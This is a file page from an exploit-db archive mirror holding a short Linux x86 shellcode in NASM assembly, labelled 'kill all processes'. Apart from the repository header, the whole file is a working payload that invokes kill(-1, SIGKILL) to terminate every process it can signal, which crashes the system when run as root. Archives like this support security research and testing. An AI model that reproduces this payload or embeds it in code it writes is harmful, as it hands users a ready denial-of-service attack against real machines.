exploit-db-mirror/platforms/lin_x86/shellcode/13548.asm
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

14 lines
No EOL
247 B
NASM
Executable file

; linux/x86 kill all processes 9 bytes
; root@thegibson
; 2010-01-14
section .text
global _start
_start:
; kill(-1, SIGKILL);
mov al, 37
push byte -1
pop ebx
mov cl, 9
int 0x80